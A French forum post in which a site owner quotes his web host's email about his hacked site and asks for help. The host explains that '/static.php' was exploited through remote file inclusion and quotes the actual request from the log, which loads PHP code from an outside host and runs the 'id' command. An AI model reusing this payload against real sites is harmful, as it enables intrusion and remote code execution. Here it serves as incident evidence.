Citation :
Anonyme
Oufti ... voici ce que me répond mon hébergeur ...
Bonjour,
,- - [ Le samedi 21 février 2004 vers 15:44 tanatloc écrivait: ] - -
|
> Que voulez-vous dire ?
> Votre serveur s'est fait hacké à cause de certains CMOD 777 placés sur mon
> site ???
|
`- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Il ne s'agit pas pour nous d'un hacking de notre serveur, seul votre site est concerné.
Nous ne pouvons affirmer que l'usage qui a été fait de votre site était un hacking ou une fonction volontaire, mais il est probable à 99% que ce soit un hacking...
Dans le cas du hacking (vous seul savez si l'usage qui a été fait de votre site d'attaquer des tiers est l'usage normal que vous souhaitez pour votre site ou non), cela signifie que certains de vos scripts/pages contiennent des trous de sécurité permettant à des tiers d'en faire un usage différent de ce que vous souhaitez.
Le cas concret mentionné dans le log précité concerne la page "/static.php" de votre site, qui a été appelée de la façon suivante :
/static.php?op=http://hack0.tripod.com.br/cse.gif?&cmd=id
Si vous visitez
http://hack0.tripod.com.br/cse.gif vous constaterez qu'il s'agit de code php, qui a probablement été placé en !!include!! par votre script et donc exécuté.
Bien à vous...
Heeeeelp que puis-je faire ???